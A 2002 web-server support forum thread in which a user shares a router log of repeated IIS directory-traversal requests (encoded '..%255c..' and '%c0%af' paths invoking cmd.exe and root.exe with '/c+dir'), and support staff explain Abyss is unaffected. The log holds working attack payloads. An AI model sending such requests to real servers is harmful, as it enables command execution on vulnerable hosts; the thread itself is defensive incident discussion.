cgi security

 
Post new topic   Reply to topic    Aprelium Forum Index -> FastCGI/CGI
View previous topic :: View next topic  
Author Message
feamsr00
-


Joined: 04 Jun 2002
Posts: 138
Location: Phila PA

PostPosted: Sun Oct 13, 2002 5:28 am    Post subject: cgi security Reply with quote

I have noticed some strange requests for unknown executibles in odd directories. I was notified by my router (witch is also running AWS). The following is a section of the log:

WinRoute - Debug Log

--------------------------------------------------------------------------------
[30/Sep/2002 18:22:21] DNS: query 68.81.145.104:58802 -> 68.80.0.6:53 for mail.earthlink.net
[30/Sep/2002 18:25:12] tmp: 68.81.134.193 -> www GET /scripts/root.exe?/c+dir HTTP/1.0
[30/Sep/2002 18:25:14] tmp: 68.81.134.193 -> www GET /MSADC/root.exe?/c+dir HTTP/1.0
[30/Sep/2002 18:25:15] tmp: 68.81.134.193 -> www GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0
[30/Sep/2002 18:25:16] tmp: 68.81.134.193 -> www GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0
[30/Sep/2002 18:25:17] tmp: 68.81.134.193 -> www GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
[30/Sep/2002 18:25:18] tmp: 68.81.134.193 -> www GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
[30/Sep/2002 18:25:19] tmp: 68.81.134.193 -> www GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
[30/Sep/2002 18:25:20] tmp: 68.81.134.193 -> www GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
[30/Sep/2002 18:25:31] tmp: 68.81.134.193 -> www GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
[30/Sep/2002 18:25:32] tmp: 68.81.134.193 -> www GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
[30/Sep/2002 18:25:34] tmp: 68.81.134.193 -> www GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0
[30/Sep/2002 18:25:38] tmp: 68.81.134.193 -> www GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
[30/Sep/2002 18:25:39] tmp: 68.81.134.193 -> www GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
[30/Sep/2002 18:25:40] tmp: 68.81.134.193 -> www GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
[30/Sep/2002 18:25:42] tmp: 68.81.134.193 -> www GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
[30/Sep/2002 18:25:46] tmp: 68.81.134.193 -> www GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
[30/Sep/2002 18:32:17] DNS: query 68.81.145.104:58806 -> 68.80.0.6:53 for mail.earthlink.net
[30/Sep/2002 18:40:05] DNS: query 68.81.145.104:58809 -> 68.80.0.6:53 for mail.bellatlantic.net
[30/Sep/2002 18:42:20] DNS: query 68.81.145.104:58811 -> 68.80.0.6:53 for mail.earthlink.net
[30/Sep/2002 18:42:29] tmp: 68.81.4.248 -> www GET /scripts/root.exe?/c+dir HTTP/1.0
[30/Sep/2002 18:42:30] tmp: 68.81.4.248 -> www GET /MSADC/root.exe?/c+dir HTTP/1.0
[30/Sep/2002 18:42:30] tmp: 68.81.4.248 -> www GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0
[30/Sep/2002 18:42:32] tmp: 68.81.4.248 -> www GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0
[30/Sep/2002 18:42:32] tmp: 68.81.4.248 -> www GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
[30/Sep/2002 18:42:34] tmp: 68.81.4.248 -> www GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
[30/Sep/2002 18:42:35] tmp: 68.81.4.248 -> www GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
[30/Sep/2002 18:42:36] tmp: 68.81.4.248 -> www GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
[30/Sep/2002 18:52:17] DNS: query 68.81.145.104:58815 -> 68.80.0.6:53 for mail.earthlink.net
[30/Sep/2002 18:52:18] DNS: query 68.81.145.104:58817 -> 68.80.0.6:53 for mail.comcast.net


--------------------------------------------------------------------------------

Only the tmp (temporary packets) are realated to the scan. Even though this happened 13 days ago they always seem to pick up after a few days. I just want to make sure that AWS is not affected whatsoever by this. I am pretty sure that my machine should not be affected by this because I am running AWS on a W98 machine.
Back to top View user's profile Send private message Visit poster's website AIM Address Yahoo Messenger MSN Messenger ICQ Number
J. Patrick
-


Joined: 26 Aug 2002
Posts: 42
Location: Pittsburgh, PA USA

PostPosted: Sun Oct 13, 2002 3:10 pm    Post subject: Reply with quote

i too have noticed the line
[30/Sep/2002 18:42:32] tmp: 68.81.4.248 -> www GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0

in my Abyss log along with a few other strange line.
Back to top View user's profile Send private message Send e-mail AIM Address
feamsr00
-


Joined: 04 Jun 2002
Posts: 138
Location: Phila PA

PostPosted: Sun Oct 13, 2002 5:04 pm    Post subject: Reply with quote

It just happened again, right now (1203 EST).I saved it if anyone want a look.
Back to top View user's profile Send private message Visit poster's website AIM Address Yahoo Messenger MSN Messenger ICQ Number
aprelium
-


Joined: 22 Mar 2002
Posts: 6800

PostPosted: Mon Oct 14, 2002 8:39 am    Post subject: Reply with quote

Someone tried to attack you computer using a serie of malicious HTTP requests. But do not worry, this kind of attacks do not affect Abyss Web Server. It is only known to do trouble on Microsoft IIS/PWS.
The best proof is the access log of AWS. You will find that all these requests were denied (Error code 400 or 404).
_________________
Support Team
Aprelium - http://www.aprelium.com
Back to top View user's profile Send private message Send e-mail
feamsr00
-


Joined: 04 Jun 2002
Posts: 138
Location: Phila PA

PostPosted: Mon Oct 14, 2002 10:16 pm    Post subject: Reply with quote

Very nice! :D Thank you.

But this cant be usedin a DOS attack can it (becuse the server still has to formulate the error page)?
Back to top View user's profile Send private message Visit poster's website AIM Address Yahoo Messenger MSN Messenger ICQ Number
aprelium
-


Joined: 22 Mar 2002
Posts: 6800

PostPosted: Tue Oct 15, 2002 1:57 am    Post subject: Reply with quote

feamsr00 wrote:
Very nice! :D Thank you.

But this cant be usedin a DOS attack can it (becuse the server still has to formulate the error page)?

No, this cannot be used in a denial of service attack (DOS). The server is still ready to respond to the each request of the attack with an error page.
_________________
Support Team
Aprelium - http://www.aprelium.com
Back to top View user's profile Send private message Send e-mail
Display posts from previous:   
Post new topic   Reply to topic    Aprelium Forum Index -> FastCGI/CGI All times are GMT + 1 Hour
Page 1 of 1

 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum


Powered by phpBB phpBB Group